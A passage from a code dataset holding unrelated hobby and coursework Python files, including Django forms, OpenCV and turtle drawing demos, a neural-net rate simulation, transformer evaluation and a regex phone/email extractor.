\"-\" + file_field\n main_files[new_file_name] = new_file\n form_count += 1\n\n # Fix management form\n main_data[formset.prefix + \"-\" + TOTAL_FORM_COUNT] = str(form_count)\n # Remove all files from first one: it will take random file in other case\n if not isinstance(main_files, MultiValueDict):\n return\n for k in main_files.keys():\n list_of_files = main_files.getlist(k)\n if isinstance(list_of_files, list) and len(list_of_files) > 1:\n del main_files[k]\n main_files.appendlist(k, list_of_files[0])\n","sub_path":"django_swissknife/forms/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"144936131","text":"\"\"\"\nRobert Kuramshin\nrobert.kuramshin@gatech.edu\n\nPart 2 of digitized circles problem \n\"\"\"\n\nimport cv2\nimport numpy as np\nfrom scipy.optimize import minimize\n\n\ndef clicked_circe(centers, click, radius):\n \"\"\"return center of the clicked circle\n\n Arguments:\n centers {tuple array} -- grid circle centers (x,y) array\n click {tuple} -- coordinates (x,y) of the click\n radius {integer} -- radius of grid circles\n\n Returns:\n typle -- coordinates of clicked circle (x,y)\n \"\"\"\n\n # iterate through all circles until we find within a radius distance of click\n for center in centers:\n if dist(center, click) <= radius:\n return center\n return None\n\n\ndef circle_intersects(centers, radius, drawn_center, drawn_radius):\n \"\"\"Find the centers of circles that are intersected by given circle\n\n Arguments:\n centers {tuple array} -- list of centers (x,y) for points to be checked\n radius {integer} -- radius of the given circles\n drawn_center {tuple} -- center coordinates (x,y) of given circle\n drawn_radius {integer} -- radius of the given circle\n\n Returns:\n tuple array -- center coordinates (x,y) of from centers array that intersect the given circle\n \"\"\"\n intersects = [] # list of intersected circle centers\n\n # iterate through circle center array and compare distance to given circle\n for center in centers:\n d = dist(center, drawn_center) # euclidean distance\n\n # if the edge of drawn circle falls inside the grid circle\n if(d <= radius+drawn_radius and d >= drawn_radius-radius):\n intersects.append(center)\n return intersects\n\n\ndef error_fun(args):\n \"\"\"Error function to be minimized\n\n Arguments:\n args {tuple} -- argument list (x,y,radius) describing circle\n\n Returns:\n integer -- error\n \"\"\"\n global clicked_arr\n global c_radius\n\n # unpack argument\n x, y, radius = int(args[0]), int(args[1]), int(args[2])\n\n # determine the number of intersected circles\n n = len(circle_intersects(clicked_arr, c_radius, (x, y), radius))\n\n # return number of circles selected but not intersected\n return (len(clicked_arr)-n)\n\n\ndef get_centroid(centers):\n \"\"\"Compute centroid of an list of circle centers\n\n Arguments:\n centers {tuple array} -- list of circles to be used\n\n Returns:\n tuple -- coordinates (x,y) of centroid\n \"\"\"\n\n # return None if centers array is empty\n if(len(centers) == 0):\n return None\n\n x = 0 # total x coordinates\n y = 0 # total y coordinates\n\n # iterate over circle centers and compute total\n for center in centers:\n x += center[0]\n y += center[1]\n\n # divide by number of samples\n x /= len(centers)\n y /= len(centers)\n\n return (int(x), int(y))\n\n\ndef avg_distance(centers, point):\n \"\"\"Find average distance from a point to a list of circle centers\n\n Arguments:\n centers {tuple array} -- list of circles to be used\n point {tuple} -- coordinate (x,y) of point to reference\n\n Returns:\n integer -- average distance\n \"\"\"\n\n d = 0 # total distance\n\n # compute and total distance from every circle center to point\n for center in centers:\n d += dist(center, point) # use euclidean distance\n\n # divide by number of samples\n d /= len(centers)\n\n return int(d)\n\n\ndef dist(a, b):\n \"\"\"Compute euclidean distance between two coordinate pairs\n\n Arguments:\n a {tuple} -- (x,y) coordinates of point one\n b {tuple} -- (x,y) coordinates of point two\n\n Returns:\n float -- distance between two points\n \"\"\"\n return np.sqrt((b[0]-a[0])**2 + (b[1]-a[1])**2)\n\n\ndef mouse_handler(event, x, y, flags, data):\n \"\"\"Mouse event handler\n\n Arguments:\n x {integer} -- x coordinate component of event location\n y {integer} -- y coordinate component of event location\n data {numpy array} -- cv2 image passed to handler\n \"\"\"\n global btn_down\n global background\n global grid_circle_centers\n global c_radius\n global clicked_arr\n global generate\n global image\n\n # mouse button release\n if event == cv2.EVENT_LBUTTONUP and btn_down:\n btn_down = False\n\n # if pressed inside generate button\n if(x > generate_x and y > generate_y):\n # compute centroid of selected grid circles\n centroid = get_centroid(clicked_arr)\n\n # return if no circles selected\n if(centroid is None):\n return\n\n generate = True # used to reset image once new circles are selected\n\n # average distance to all points used as radius guess\n avg_dist = avg_distance(clicked_arr, centroid)\n\n # use centroid and avg_dist as initial guesses for minimization function\n guess = (centroid[0], centroid[1], avg_dist)\n\n cv2.circle(image, centroid, avg_dist, (0, 0, 255), 1) # draw guess\n\n m = minimize(error_fun, guess, method=\"Nelder-Mead\").x # minimize\n\n # draw minimized circle and show\n cv2.circle(image, (int(m[0]), int(m[1])),\n int(m[2]), (255, 0, 0), 1)\n cv2.imshow(\"Part 2\", image)\n\n # find clicked circle if any\n clicked = clicked_circe(grid_circle_centers, (x, y), c_radius)\n\n if clicked:\n # add clicked circle to list of selected circles\n clicked_arr.append(clicked)\n # change color of selected circle and draw\n cv2.circle(image, clicked, c_radius, (255, 0, 0), -1)\n cv2.imshow(\"Part 2\", image)\n\n # mouse button pressed\n elif event == cv2.EVENT_LBUTTONDOWN:\n btn_down = True\n\n # circle has been generate and new points are selected\n if generate:\n image = background.copy() # reset background\n generate = False\n clicked_arr = [] # reset list of selcted points\n cv2.imshow(\"Part 2\", background) # draw\n\n\nbtn_down = False # mouse clicked\ngenerate = False # circle has been generated\nclicked_arr = [] # array of selected grid circles\n\n# generate button location\ngenerate_x = 720\ngenerate_y = 780\n\n# image dimensions\nimage_height = 800\nimage_width = 800\n\n# grid parameters\nn_dots_h = 20\nn_dots_v = 20\n\n# grid circle size\nc_radius = 10\n\n# create white image\nbackground = 255 * np.ones((image_height, image_width, 3), np.uint8)\n\n# calculate horizontal and vertical distances between grid circles\nh_offset = int(image_height/(n_dots_h+1))\nv_offset = int(image_width/(n_dots_v+1))\n\n# array of grid circle centers\ngrid_circle_centers = []\n\n# iteratively draw grid circles and populate grid_circle_centers\nfor i in range(1, n_dots_h+1):\n for j in range(1, n_dots_v+1):\n grid_circle_centers.append((i*h_offset, j*v_offset))\n cv2.circle(background, (i*h_offset, j*v_offset),\n c_radius, (100, 100, 100), -1)\n\n# Draw generate button\ncv2.rectangle(background, (generate_x, generate_y),\n (800, 800), (0, 255, 0), -1)\n\n# Keep global copy of background for resetting the screen\nimage = background.copy()\n\n# draw and start callback\ncv2.imshow(\"Part 2\", image)\ncv2.setMouseCallback(\"Part 2\", mouse_handler, image)\ncv2.waitKey(0)\n","sub_path":"part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":7283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"289131976","text":"predictions = [2, 2, 3, 3, 3, 4, 2, 2, 3, 1, 4, 1, 3, 1, 2, 1, 2, 1, 4, 4]\ntruths = [3, 3, 1, 1, 1, 4, 3, 3, 4, 2, 4, 2, 1, 2, 3, 2, 1, 2, 4, 4]\n\nassert(len(predictions) == len(truths))\n\ntp = 0\nfp = 0\ntn = 0\nfn = 0\n\n# For every tuple\nfor i in range(len(predictions)):\n for j in range(len(truths)):\n if j <= i:\n continue\n else:\n # Same class, same cluster\n if truths[i] == truths[j] and predictions[i] == predictions[j]:\n tp += 1\n # Different class, same cluster\n elif truths[i] != truths[j] and predictions[i] == predictions[j]:\n fp += 1\n # Same class, different cluster\n elif truths[i] == truths[j] and predictions[i] != predictions[j]:\n fn += 1\n # Different class, different cluster\n elif truths[i] != truths[j] and predictions[i] != predictions[j]:\n tn += 1\n\nprint(\"TP: \", tp)\nprint(\"FP: \", fp)\nprint(\"TN: \", tn)\nprint(\"FN: \", fn)\nprint(\"Total: \", tp+fp+tn+fn)","sub_path":"hw4/CS145_HW3_Release_Python3/precision.py","file_name":"precision.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"568549036","text":"#!/usr/bin/env python3\n\nfrom datetime import date, timedelta\n\n\nTEAM = (\n # Week 0.\n 'Casey',\n 'Eduardo',\n 'Allan',\n 'JC',\n 'Martin',\n # Week 1.\n 'Brian',\n 'Ales',\n 'Fabrice',\n 'Domas',\n 'Austin',\n)\n\n\nday = date.today()\n_, weeknum, weekday = day.isocalendar()\nif weekday > 5:\n weekday = 1\n weeknum += 1\nindex = weekday - 1 + 5 * (weeknum % 2)\npeople = TEAM * 2\none_day = timedelta(days=1)\nsummary = [{'name': '', 'people': []} for _ in range(5)]\n\nprint('Calendar:')\nfor _ in range(14):\n wday = day.weekday()\n if wday < 5:\n prefix = '* ' if wday == 0 else ' '\n print('{}{}: {}'.format(prefix, day.strftime('%a %m-%d'), people[index]))\n summary[wday]['people'].append(people[index])\n summary[wday]['name'] = day.strftime('%a')\n index +=1\n day += one_day\n\nprint('\\nSummary:')\nfor num, day in enumerate(summary):\n prefix = '* ' if num+1 == weekday else ' '\n print('{}{}: {}'.format(prefix, day['name'], ', '.join(day['people'])))\n","sub_path":"css.py","file_name":"css.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"105661727","text":"from http import HTTPStatus\n\nfrom flask import request, jsonify, abort\n\n\ndef get_json():\n json_req = request.get_json()\n if not json_req:\n abort(\n jsonify(\n {\n 'error': True,\n 'status': 'failed',\n 'description': 'Not JSON request.',\n }\n ),\n HTTPStatus,\n )\n return json_req\n","sub_path":"server/views/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"118118481","text":"# import the necessary packages\nfrom picamera.array import PiRGBArray\nfrom picamera import PiCamera\nimport time\nimport cv2\nimport numpy as np\nimport funktiot\nimport time\nfrom threading import Thread\n# kaskadien lataus\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\neye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')\n\n\n\n# initialize the camera and grab a reference to the raw camera capture\ncamera = PiCamera()\ncamera.resolution = (500, 300)\ncamera.framerate = 60\nrawCapture = PiRGBArray(camera, size=(500, 300))\n \n# allow the camera to warmup\ntime.sleep(0.1)\n#laskuri fps laskuria varten\nlaskuri = 0\n# capture frames from the camera\nfor frame in camera.capture_continuous(rawCapture, format=\"bgr\", use_video_port=True):\n\n\t# grab the raw NumPy array representing the image, then initialize the timestamp\n\t# and occupied/unoccupied text\n\timage = frame.array\n\tgray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n\t\n\tfaces = face_cascade.detectMultiScale(gray, 1.3, 5)\n\tfor (x,y,w,h) in faces:\n\t\tpoints_hattu, points_parta = suodattimen_paikka(x,y,w,h)\n\t\tpiirra_suodatin(points_hattu, points_parta)\n\n\tif laskuri == 0:\n\t\talku_aika = time.time()\n\tlaskuri+=1\n\tif laskuri == 15:\n\t\tfps = str(round(float((15/(time.time()-alku_aika)))))\n\t\tlaskuri = 0\n\t\tprint((fps))\n\t\t\n\t\n\tcv2.putText(image, fps, (10, 50), cv2.FONT_HERSHEY_DUPLEX, 2, (0,255,0))\n\tcv2.imshow(\"Frame\", image)\n\t# clear the stream in preparation for the next frame\n\trawCapture.truncate(0)\n\t\n\tkey = cv2.waitKey(1) & 0xFF\n\t# if the `q` key was pressed, break from the loop\n\tif key == ord(\"q\"):\n\t\tbreak\n","sub_path":"python/filter_version_3/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"317908733","text":"import os\nimport numpy as np\nimport scipy as sc\nimport scipy.stats\nimport matplotlib.pyplot\nimport multiprocessing\nimport time\nimport ShareYourSystem as SYS\n\nclass RateModelClass():\n\n\tdef __init__(self,_UnitsInt):\n\n\t\t#Params Definition (and Declaration)\n\t\tself.UnitsInt=_UnitsInt\n\t\tself.ConstantTimeFloat=20.\n\t\tself.RestRateFloat=0.\n\t\tself.StartRateFloat=10.\n\t\tself.RunTimeFloat=10.\n\t\tself.StepTime=0.1\n\t\tself.ConnectivityFloat=0.2\n\t\tself.WeightFloat=1.\n\n\t\t#Variables Declaration\n\t\tself.RateFloatsArray=np.zeros((self.UnitsInt,(int)(self.RunTimeFloat/self.StepTime)),dtype=float)\n\t\tself.RateFloatsArray[:,0]=self.StartRateFloat*sc.stats.uniform.rvs(size=self.UnitsInt)\n\t\tself.WeigthsArray=1.*sc.stats.bernoulli.rvs(self.ConnectivityFloat,size=(self.UnitsInt,self.UnitsInt))\n\t\tself.AnalysisDict={}\n\n\n\t#Methods Definition\n\n\tdef initSimulation(self):\n\n\t\t#Init the RateFloatsArray\n\t\tself.RateFloatsArray=np.zeros((self.UnitsInt,(int)(self.RunTimeFloat/self.StepTime)),dtype=float)\n\t\tself.RateFloatsArray[:,0]=self.StartRateFloat*sc.stats.uniform.rvs(size=self.UnitsInt)\n\n\t\t#Set the SynapticWeigthsArray\n\t\tself.WeigthsArray=self.WeightFloat*sc.stats.bernoulli.rvs(self.ConnectivityFloat,size=(self.UnitsInt,self.UnitsInt))\n\n\t\t#Init the AnalysisDict\n\t\tself.AnalysisDict={}\n\n\t\t#Return self\n\t\treturn self\n\n\tdef runSimulation(self):\n\n\t\t#Compute the first order differential equation\n\t\tfor TimeIndexInt in xrange(1,(int)(self.RunTimeFloat/self.StepTime)):\n\n\t\t\tself.RateFloatsArray[:,TimeIndexInt]= self.RateFloatsArray[:,TimeIndexInt-1] + (\n\t\t\t\t\t\t\t\t\t\t\t\t#Leak Term\n\t\t\t\t\t\t\t\t\t\t\t\t-self.RateFloatsArray[:,TimeIndexInt-1] + np.tanh(np.dot(\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t#Interaction Term\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.WeigthsArray,self.RateFloatsArray[:,TimeIndexInt-1]))\n\t\t\t\t\t\t\t\t\t\t\t\t) * (self.StepTime/self.ConstantTimeFloat)\n\n\t\t#Return self\n\t\treturn self\n\n\tdef plotSimulation(self):\n\t\tFigure,Axe=matplotlib.pyplot.subplots()\n\t\tAxe.plot(self.StepTime*np.array(range((int)(self.RunTimeFloat/self.StepTime))),self.RateFloatsArray.T)\n\t\tAxe.set_xlabel(\"$t\\ (ms)$\")\n\t\tAxe.set_ylabel(\"$r_{i}(t)\\ ()$\")\n\t\tAxe.set_title(\"From Object protocol\")\n\t\t\n\t\t#Return self\n\t\treturn self\n\n\tdef recordSimulation(self):\n\n\t\tAnalysisDict={\n\t\t\t\t\t\t#Analysis Data\n\t\t\t\t\t\t\"MeanRateFloatsList\":np.mean(self.RateFloatsArray),\n\t\t\t\t\t\t\"STDRateFloatsList\":np.std(self.RateFloatsArray),\n\t\t\t\t\t\t#Corresponding Parameters\n\t\t\t\t\t\t\"UnitsInt\":self.UnitsInt,\n\t\t\t\t\t\t\"ConstantTimeFloat\":self.ConstantTimeFloat,\n\t\t\t\t\t\t\"RunTimeFloat\":self.RunTimeFloat,\n\t\t\t\t\t\t\"StepTime\":self.StepTime,\n\t\t\t\t\t\t\"ConnectivityFloat\":self.ConnectivityFloat\n\t\t}\n\t\t#Or quicker...\n\t\tAnalysisDict=dict({\n\t\t\t\t\t\t#Analysis Data\n\t\t\t\t\t\t\"MeanRateFloatsList\":np.mean(self.RateFloatsArray),\n\t\t\t\t\t\t\"STDRateFloatsList\":np.std(self.RateFloatsArray)\n\t\t\t\t\t},**self.__dict__)\n\t\t\t\t\t\t#\"UnitsInt\":self.UnitsInt,\n\t\t\t\t\t\t#\"ConstantTimeFloat\":self.ConstantTimeFloat,\n\t\t\t\t\t\t#\"RunTimeFloat\":self.RunTimeFloat,\n\t\t\t\t\t\t#\"StepTime\":self.StepTime,\n\t\t\t\t\t\t#\"ConnectivityFloat\":self.ConnectivityFloat\n\n\n\t\t\"\"\"\n\t\t#################################\n\t\t#ENCAPSULATION AVOIDS THE INFINITE HAND WRITING TASK FOR THE SERIALIZATION PROBLEM...\n\t\t\"\"\"\n\n\t\t#Return self\n\t\treturn self\n\n\tdef writeSimulation(self):\n\t\t#addData(open(\"Data.dat\"),self.AnalysisDict)\n\t\t\n\t\t#Return self\n\t\treturn self\n\n\"\"\"\n#################################\n# (C) PARALLELIZE PROCESSES... \n\"\"\"\n\nUnitIntsList=xrange(1,1000)\ndef doProtocolWithUnitsInt(_UnitsInt):\n\tRateModelClass(_UnitsInt).initSimulation().runSimulation().recordSimulation().writeSimulation()\nMyPool=multiprocessing.Pool(processes=min(100,len(UnitIntsList)))\n\n\"\"\"\n#Sequential\ntic=time.time()\nmap(lambda UnitsInt:doProtocolWithUnitsInt(UnitsInt),UnitIntsList)\nprint('Sequential Calcul : '+str(time.time()-tic))\n\"\"\"\n\n#Parallel\ntic=time.time()\nMyPool.map(doProtocolWithUnitsInt,UnitIntsList)\nprint('Paralell Calcul : '+str(time.time()-tic))\n\n#for UnitIntsList=xrange(1,1000) processes=min(99,len(UnitIntsList))\n#Sequential Calcul : 0.352154016495\n#Paralell Calcul : 0.107304811478\n\n#for UnitIntsList=xrange(1,1000) processes=min(99,len(UnitIntsList))\n#Sequential Calcul : 39.8414371014\n#Paralell Calcul : 22.0918791294\n\n#doProtocol(10)\n\n","sub_path":"Modules/Scripts/Script3.py","file_name":"Script3.py","file_ext":"py","file_size_in_byte":4110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"183967780","text":"# ============Imports===============\nfrom tqdm.auto import tqdm\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom transformers import DistilBertTokenizerFast, get_scheduler\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nfrom transformers import DistilBertForSequenceClassification, ElectraForSequenceClassification, AdamW\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score\nimport os\n\ndevice = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n# =================Hyperparameters=================\nnum_epochs = 3\ncheckpoint1 = 'distilbert-base-uncased'\ncheckpoint2 = 'google/electra-small-discriminator'\nmax_len = 512\nmodel1 = 'distilbert'\nmodel2 = 'electra'\nmodel3 = 'ensemble'\nmodel_name = model2\n\n# ===========Load data and preprocess ==============\n\ntest_df = pd.read_csv('test.csv')\ntest_df.columns = ['label','text']\ntest_df['label'] = test_df['label'] - 1\ntest_texts = test_df['text'].values.tolist()\ntest_labels = test_df['label'].values.tolist()\n\n# =================Tokenizing and creating data loaders=====================\ntokenizer = DistilBertTokenizerFast.from_pretrained(checkpoint2)\ntest_encodings = tokenizer(test_texts, truncation=True, padding=True, max_length=max_len)\n\nclass YelpDataset(torch.utils.data.Dataset):\n def __init__(self, encodings, labels):\n self.encodings = encodings\n self.labels = labels\n\n def __getitem__(self, idx):\n item = {key: torch.tensor(val[idx]) for key, val in self.encodings.items()}\n item['labels'] = torch.tensor(self.labels[idx])\n return item\n\n def __len__(self):\n return len(self.labels)\n\ntest_dataset = YelpDataset(test_encodings, test_labels)\n\ntest_dataloader = DataLoader(test_dataset, shuffle=True, batch_size=8)\n\n# ==========================Models============================================\n\nclass Classifier(nn.Module):\n def __init__(self):\n super(Classifier, self).__init__()\n self.m1 = DistilBertForSequenceClassification.from_pretrained(checkpoint1)\n self.m2 = ElectraForSequenceClassification.from_pretrained(checkpoint2)\n self.dropout = nn.Dropout(0.3)\n self.out3 = nn.Linear(4,2)\n def forward(self, ids):\n output_1 = self.m1(ids, return_dict=False)\n output_2 = self.dropout(output_1[0])\n output_3 = self.m2(ids, return_dict=False)\n output_4 = self.dropout(output_3[0])\n output_5 = torch.cat((output_2, output_4), dim=1)\n output = self.out3(output_5)\n return output\n\nif model_name == model1:\n model = DistilBertForSequenceClassification.from_pretrained(checkpoint1)\nelif model_name == model2:\n model = ElectraForSequenceClassification.from_pretrained(checkpoint2)\nelif model_name == model3:\n model = Classifier()\n\nmodel.load_state_dict(torch.load('model_{}.pt'.format(model_name), map_location=device))\nmodel.to(device)\n\nPRED = []\nY = []\ndef update(pred,y):\n x = pred.detach().cpu().numpy()\n z = y.detach().cpu().numpy()\n for i in range(len(x)):\n PRED.append(x[i])\n Y.append(z[i])\n\nnum_eval_steps = len(test_dataloader)\nprogress_bar = tqdm(range(num_eval_steps))\n\nmodel.eval()\nfor batch in test_dataloader:\n torch.no_grad()\n input_ids = batch['input_ids'].to(device)\n labels = batch['labels'].to(device)\n if (model_name == model1) | (model_name == model2):\n outputs = model(input_ids, labels=labels)\n logits = outputs.logits\n else:\n outputs = model(input_ids)\n logits = outputs\n predictions = torch.argmax(logits, dim=-1)\n update(predictions,labels)\n progress_bar.update(1)\n\n\nacc = accuracy_score(Y, PRED)\nprint(\"\\nValidation accuracy:\",acc)\n\npre = precision_score(Y, PRED)\nprint(\"\\nValidation precision:\",pre)\n\nrec = recall_score(Y, PRED)\nprint(\"\\nValidation recall:\",rec)","sub_path":"Nitin-Godi-Individual-Project/Code/my_script_transformers_test.py","file_name":"my_script_transformers_test.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"565354921","text":"from django import forms\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ValidationError, ObjectDoesNotExist\nfrom django.forms import widgets\nfrom webapp.models import Issue, Status, Type, Project, Team\nfrom datetime import datetime\n\n\ndef get_all_project_of_user(user):\n return Project.objects.filter(teams__participant_id=user)\n\n\nclass IssueForm(forms.ModelForm):\n assigned_to = forms.ModelChoiceField(queryset=User.objects.all(), label='Исполнитель', empty_label='Укажите исполнителя')\n\n class Meta:\n model = Issue\n exclude = ['created_at', 'created_by', 'project']\n\n\nclass ProjectForm(forms.ModelForm):\n participants = forms.ModelMultipleChoiceField(queryset=User.objects.all(), label='Участники проекта', required=False)\n\n class Meta:\n model = Project\n exclude = ['created_at', 'updated_at']\n\n def save(self, commit=True):\n project = super().save()\n self.delete_participants(project)\n self.add_participants(project)\n return project\n\n def delete_participants(self, project):\n for team in Team.objects.filter(project=project):\n if team.participant not in self.cleaned_data['participants']:\n team.finished_at=datetime.now()\n team.save()\n\n def add_participants(self, project):\n for participant in self.cleaned_data['participants']:\n team, _ = Team.objects.get_or_create(project=project, participant=participant)\n team.finished_at = None\n team.save()\n\n\nclass ChangeTeamForm(forms.ModelForm):\n participants = forms.ModelMultipleChoiceField(queryset=User.objects.all(), label ='Выберите участников проекта', required=False)\n\n class Meta:\n model = Project\n fields = ['participants']\n\n def save(self, commit=True):\n project = super().save()\n self.delete_participants(project)\n self.add_participants(project)\n return project\n\n def delete_participants(self, project):\n for team in Team.objects.filter(project=project):\n if team.participant not in self.cleaned_data['participants']:\n team.finished_at=datetime.now()\n team.save()\n\n def add_participants(self, project):\n for participant in self.cleaned_data['participants']:\n team, _ = Team.objects.get_or_create(project=project, participant=participant)\n team.finished_at = None\n team.save()\n\n\nclass StatusForm(forms.ModelForm):\n class Meta:\n model = Status\n fields = ['name']\n\n\nclass TypeForm(forms.ModelForm):\n class Meta:\n model = Type\n fields = ['name']\n\n\nclass SimpleSearchForm(forms.Form):\n search = forms.CharField(max_length=100, required=False, label='Найти')","sub_path":"source/webapp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"518073176","text":"#!/usr/bin/env python3\n#-*- coding: utf-8 -*-\n\nimport sys\nsys.path.append('../')\n\nfrom models.container import Container\n\nclass Unit(Container):\n\n def __init__(self, engineobj=None, *components):\n\n super().__init__(engineobj, *components)\n\n\nif __name__=='__main__':\n\n u = Unit()\n\n print(u.components)\n\n","sub_path":"resources/hexeng/models/unit.py","file_name":"unit.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"25115981","text":"#!/usr/bin/env python\n#\n# (c) 2012 Commonwealth of Australia\n# Australian Bureau of Meteorology, COSPPac COMP\n# All Rights Reserved\n#\n# Authors: Sheng Guo \n# Jason Smith \n\ndef nameformat(lat,lon):\n\n #if lat >= 0:\n # latst = '%s%s' % ('+',lat)\n #if lon >= 0:\n # lonst = '%s%s' % ('+',lon)\n\n latstr = '%+08.3f' % float(lat)\n lonstr = '%+08.3f' % float(lon)\n\n return latstr, lonstr\n\ndef NESWformat(lat,lon):\n lat = round(float(lat),2)\n lon = round(float(lon),2)\n latstr = str(lat)\n lonstr = str(lon)\n\n if lat >= 0:\n latstr = '%s %s' % (lat,'N')\n\n if lon >= 0:\n lonstr = '%s %s' % (lon,'E')\n\n if lat < 0:\n laty = abs(lat)\n latstr = '%s %s' % (laty,'S')\n\n if lon < 0:\n lony = abs(lon)\n lonstr = '%s %s' % (lony,'W')\n\n return latstr,lonstr\n","sub_path":"ocean/datasets/ww3/formatter.py","file_name":"formatter.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"451791478","text":"import turtle\n\nt = turtle.Turtle()\nt.speed(10000)\nt.ht()\n\ndef hexagon(x, y):\n\n\tt.setposition(x, y)\n\tt.left(30)\n\tt.forward(a)\n\tt.left(120)\n\t\n\tfor _ in range(6):\n\t\tt.pendown()\n\t\tt.forward(a)\n\t\tt.left(60)\n\t\tt.penup()\n\t\t\n\tt.left(60)\n\tt.forward(a)\n\tt.left(150)\n\n\nn = int(input('Введите количество шестиугольников вдоль стороны большого шестиугольника: '))\na = int(input('Введите длинну сторны шестиугольника: '))\nh = a * (3 ** (1/2)) / 2\n\nt.penup()\n\nfor i in range(2 * n - 1):\n\tx = ((n - 1) - i) * (2 * h)\n\ty = 0\n\thexagon(x, y)\n\nfor i in range(n - 1):\n\tfor j in range((n - 1) * 2 - i):\n\t\tx = ((2 * (n - 1) - 1) - i) * h - (2 * h * j) \n\t\ty = (3 / 2) * a * (i + 1)\n\t\thexagon(x, y)\n\t\thexagon(x, -y)\n\nt.home()\ninput()","sub_path":"HW_#1_1.py","file_name":"HW_#1_1.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"531254784","text":"from collections import deque\r\n\r\ndef bfs(n, m, x, y, infests, vaccinateds, visited):\r\n queue = deque()\r\n empty = m * n\r\n count = 0\r\n for vaccinated in vaccinateds:\r\n a, b = vaccinated\r\n visited[a - 1][b - 1] = True\r\n empty -= 1\r\n\r\n for infest in infests:\r\n a, b = infest\r\n visited[a - 1][b - 1] = True\r\n empty -= 1\r\n queue.append([a - 1, b - 1, 0])\r\n\r\n while queue and empty:\r\n print(x,y)\r\n x, y = queue.popleft()\r\n visited[x][y] = True\r\n DELTAS = ((0, 1), (0, -1), (1, 0), (-1, 0))\r\n for dx, dy in DELTAS:\r\n next_x, next_y = x + dx, y + dy\r\n if visitable(n, m, next_x, next_y, visited) and infest[next_x][next_y] == infest[x][y]:\r\n queue.append((next_x, next_y))\r\n visited[next_x][next_y] = True\r\n empty -= 1\r\n count += 1\r\n return count if empty >= 0 else -1\r\ndef visitable(n, m, x, y, visited):\r\n return 0 <= x < n and 0 <= y < m and not visited[x][y]\r\n\r\ndef solution(m, n, infests, vaccinateds):\r\n answer = 0\r\n visited = [[[False] for _ in range(n)] for _ in range(m)]\r\n\r\n\r\n for index1 in range(m):\r\n for index2 in range(n):\r\n answer = bfs(m, n, index1, index2, infests, vaccinateds, visited)\r\n\r\n return answer\r\n\r\n\r\nm = 2\r\nn = 4\r\ninfests = [[1,4],[2,2]]\r\nvaccinateds = [[1,2]]\r\nprint(solution(m,n,infests,vaccinateds))","sub_path":"전염병.py","file_name":"전염병.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"546652635","text":"#! python3\n# Chapter7PhoneNumberAndEmailAddressExtractor\n\n# NOTE: This is taken directly from the book, and doesn't work\n# Not sure if this can be fixed, moving onto the next example.\n\nimport re\n\n# Docs for Pyperclip:\n# https://pyperclip.readthedocs.io/en/latest/introduction.html\n\n# Project Goals:\n\n# 1. Use the pyperclip module to copy and paste strings.\n\n# 2. Create two regexes, one for matching phone numbers and the other for matching email addresses.\n\n# 3. Find all matches, not just the first match, of both regexes.\n\n# 4. Neatly format the matched strings into a single string to paste.\n\n# 5. Display some kind of message if no matches were found in the text.\n\nphoneNumberRegex = re.compile(r'''(\n (\\d{3}|\\(\\d{3}\\))? # Area Code\n (\\s|-|\\.)? # Separator\n (\\d{3}) # First Three Digits\n (\\s|-|\\.) # Separator\n \\d{4} # Last Four Digits\n (\\s*(ext|x|ext.)\\s*\\d{2,5})? # Extension\n)''', re.VERBOSE)\n\nmo1 = phoneNumberRegex.search('My phone number is (555) 555-5555 ext 3. My second phone number is (777) 777-7777 ext 7').group()\n\nprint('mo1 = ' + str(mo1))\n\nemailRegex = re.compile(r'''(\n [a-zA-Z0-9._%+-]+ # username\n @ # @ symbol\n [a-zA-Z0-9.-]+ # domain name\n (\\.[a-zA-Z]{2,4}) @ dot-something\n )''', re.VERBOSE)\n\nmo2 = emailRegex.findall('My e-mail address is example@example.com')\n\nprint('mo2 = ' + str(mo2))\n\ntext = str(input('Please copy and paste the text into here, and hit enter to extract any email addresses:'))\n\nmatches = []\n\nfor groups in phoneNumberRegex.findall(text):\n phoneNum = '-'.join([groups[1], groups[3], groups[5]])\n if groups[8] != '':\n phoneNum += ' x' + groups[8]\n matches.append(phoneNum)\n\nfor groups in emailRegex.findall(text):\n matches.append(groups[0])\n\nif len(matches) > 0:\n 